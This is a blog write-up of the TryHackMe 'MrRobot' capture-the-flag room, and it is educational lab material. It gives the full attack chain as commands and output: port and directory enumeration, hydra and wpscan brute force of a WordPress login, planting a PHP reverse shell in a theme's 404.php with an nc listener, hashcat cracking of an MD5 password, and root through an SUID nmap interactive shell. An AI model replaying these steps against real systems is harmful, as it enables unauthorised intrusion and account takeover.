Posts MrRobot on Tryhackme
Post
Cancel

MrRobot on Tryhackme

THM MrRobot Link

MrRobot CTF WriteUp

by Zebra

RoomDateDifficultyTypeTimeOwn IntentionMachine
MrRobot09.11.2020MediumChallenge1,5hEasyLinux

Tasks

TaskQuestion
Task 1.*Autocomplete
Task 2.1What is key 1?
Task 2.2What is key 2?
Task 2.3What is key 3?

Introduction

Hello and welcome to the write-up of the room “MrRobot” on tryhackme.
MrRobot is a room marked as medium, but in my opinion its an easy room. First we had a lot of input on http content and an interactive shell. But this is all informatively around the mr Robot world, but not really helpful for our CTF.
So its necessary to enumerate the http service with some tools and poke around. After we find some interesting files and credentials we could get an reverse shell over wordpress. The path to get the credentials of the wp admin panel is split in hydra brute forcing and web enumeration. For priv-escalation we do our normal stuff and find an interesting SUID.

So let’s begin:

Preparation Steps

1
2
3
4
5
6
7
8
mkdir mrrobot    #New Room folder
cd mrrobot   	  #Move into folder
mkdir nmap  	  #Nmap directory
mkdir gobuster  #Gobuster directory
sudo nano /etc /hosts #$ip mrrobot.thm
export target=10.10.129.15
export golist=/usr/share/seclists/Discovery/Web-Content/common.txt
export rockyou=/usr/share/wordlists/rockyou.txt

Scanning and Enumeration

Lets begin with a simple nmap only portscan and sort with a grep command.

Nmap Scan

  1. Check all open ports
  2. Get a list with the open ports
  3. Run a nmap scan on the ports
1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.91 scan initiated Sun Nov  8 18:03:07 2020 as: nmap -Pn -p- -oN nmap/ports 10.10.129.15
Nmap scan report for 10.10.129.15
Host is up (0.00021s latency).
Not shown: 65531 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
53/tcp  closed domain
80/tcp  open   http
443/tcp open   https
                                                                                                                            

cat ./nmap/ports |grep open | awk -F/ '{print $1}' ORS=','
80,443,

Now we can use this little Portscan to scan the Ports fully.

nmap -A -T4 -p 80,443 $targetIP

Our output shows us the following results:

PortServiceInformation’s
22/tcpsshssh
80/tcphttpApache

Web Enumeration

Visite web-pages:

Firefox: http://10.10.129.15/

Interactive shell with some cool videos and information’s around mr Robot. But nothing really helpful.

Web directory enumeration:

We could use one of our preferred tools like dirbuster, gobuster or dirsearch.

I will use dirsearch

python3 /home/kali/tools/dirsearch/dirsearch.py -u http://10.10.129.15 -e php,html,txt

Output:

Pathtypepriorityinformation
/robots.txttxthighhidden paths, usernames, passwords
/admin/index.htmlhtmlmediumlogin page
/wp-login.phpwordpresshighlogin page
/readme.htmlhtmllowusernames, passwords, hints
/blog.phpwordpressmediumusernames, passwords, hints
/license.txttxthighusernames, passwords, hints

Wp enumeration

Wordpress enumeration with wp scan.

wpscan --url http://10.10.245.239/ --enumerate p | tee wpscan

Get some inforamtions about themes etc.


Text file inspection

Visite : http://10.10.129.15/robots.txt
Visite : http://10.10.129.15/license.txt

When i visite a txt file on a webserver i searched for words like pass, password, user and username.

Robots.txt:

In the robots.txt file we find the file path for Task 2.1.

So show the flag with cat http://10.10.129.15/key-1*****'.txt

And take an interesting list with the name fsocity.dic.
wget http://10.10.129.15/fsocity.dic

When i download i list like this, which looks like a password or username list i do the following command for checking if there are doubled words.
sort fsocity.dic | uniq -d ## check if duplicated ones ## check for double words.
sort fsocity.dic | uniq >fsocity_sorted_txt ## create new sorted file.

### Task 2.1 solved ###


license.txt (Web enum credential path):

In the license.txt we find at the bottom an interesting string. The “=” at the and is often a hint for a base64 string.

Use the following command for decoding base64:

echo "string" | base64 -d

Cool. We had some credentials to login.


Hydra credential path

If we don’t find the string for the login credentials we could use hydra to brute force the wp-login page.
So lets build the path for this.

Active burp and intercept a login Post.

1
2
3
4
5
6
Host: 10.10.129.15
...
...
...

log=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1POST /wp-login.php HTTP/1.1

Username brute force.

use the last path of our burp output.

hydra -L fsocity_sorted.txt -v -p test 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 30

1
2
3
4
5
6
7
8
hydra -L fsocity_sorted.txt -v -p test 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 30

[DATA] attacking http-post-form://10.10.129.15:80/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 2367.00 tries/min, 2367 tries in 00:01h, 9085 to do in 00:04h, 30 active
[80][http-post-form] host: 10.10.129.15   login: elliot   password: test
[80][http-post-form] host: 10.10.129.15   login: ELLIOT   password: test
[80][http-post-form] host: 10.10.129.15   login: Elliot   password: test

Possible Usernames: elliot, Elliot and ELLIOT. (The name of the main character in MrRobot)

3.) Password brute force

a) wpscan --url http://10.10.129.15 -t 50 -U Elliot -P fsocity_sorted.txt

1
2
3
wpscan --url http://10.10.129.15 -t 50 -U Elliot -P fsocity_sorted.txt
[!] Valid Combinations Found:
| Username: Elliot, Password: ER28-0652 

b) hydra -l Elliot -v -P fsocity_sorted.txt 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -t 30


Wordpress php exploitation

Now we have the credentials for the wp dashboard and could start to get our exploit running.
Our way to go is to place a php reverse shell on the page. The path for this is on the left side: Appearance/Editor/404.php Edit the 404.php and paste in a reverse shell of pentestmonkey (change to your ip and fav port).
Save the changes and start a listener with:

rlwrap nc -lvnp 9001 (rlwrap Link)

Visit for activation: http://10.10.129.15/404.php

Stabilize:

python -c 'import pty;pty.spwan("/bin/bash")' ctrl-z stty raw -echo fg enter enter export TERM=xterm


Privilege escalation

We do our normal inspection of the system: id, pwd, cat /etc/crontab, cat /etc/passwd #check users and find robot, cd /home/robot

Escalate to robot

We could choose if we escalate to a user or directly to root. I choose the way to escalate to robot first.

1
2
3
4
5
6
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

The info of this output give us a useful file for escalation, because we could not cat key2 directly.

cat password.raw-md5 and check with hash-identifier: Its an md5 hash.

Md5 hash cracking:

Save the md5 hash in a new file (the hash is the string after “robot:”).
I prefer to use crackstation for crack the password but you can also use hashcat:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...


Host memory required for this attack: 67 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: c3fcd3d76192e4007dfb496cca67e13b
Time.Started.....: Mon Nov  9 15:32:01 2020 (0 secs)
Time.Estimated...: Mon Nov  9 15:32:01 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3984.3 kH/s (0.55ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 49152/14344385 (0.34%)
Rejected.........: 0/49152 (0.00%)
Restore.Point....: 36864/14344385 (0.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: holabebe -> trudy

Started: Mon Nov  9 15:32:00 2020
Stopped: Mon Nov  9 15:32:02 2020
                                                                                                     

$ hashcat hash --show                               
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz

Now we have the password and could login to robot with su robot.

SUID for priv escalation

You could upload tools like linpeas or LinEnum or do a manual research first. I like the manual inspection, cause i lear more then let a tool find the escalation path. Try commands like sudo -l and cat /etc/crontab to look for hints. But the right path is the suid one.

Run commands to find SUID:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown

One command is interesting. The nmap command. Lets check GTFobis for escalating.

Nmap SUID escalation:

In the sections “shell” at point “b)” you could fint the right and simple solution to escalate. Lets do this:

1
2
3
4
5
6
robot@linux:~$ /usr/local/bin/nmap -v
/usr/local/bin/nmap -v

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2020-11-09 14:40 UTC
No target machines/networks specified!
QUITTING!

Right Version? Check!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
robot@linux:~$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# find / -type f -name "*key-3-*" 2>/dev/null
find / -type f -name "*key-3-*" 2>/dev/null
/root/key-3-of-3.txt
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
FindTheKeyOnYourOwn
# 

ROOOOOOOT!!!!


What we learned:

  1. Web enumeration with dirsearch
  2. Wordpress enumeration with wpscan
  3. Wordpress login brute force with hydra and wpscan
  4. SUID escalation with nmap

This post is licensed under CC BY 4.0 by the author.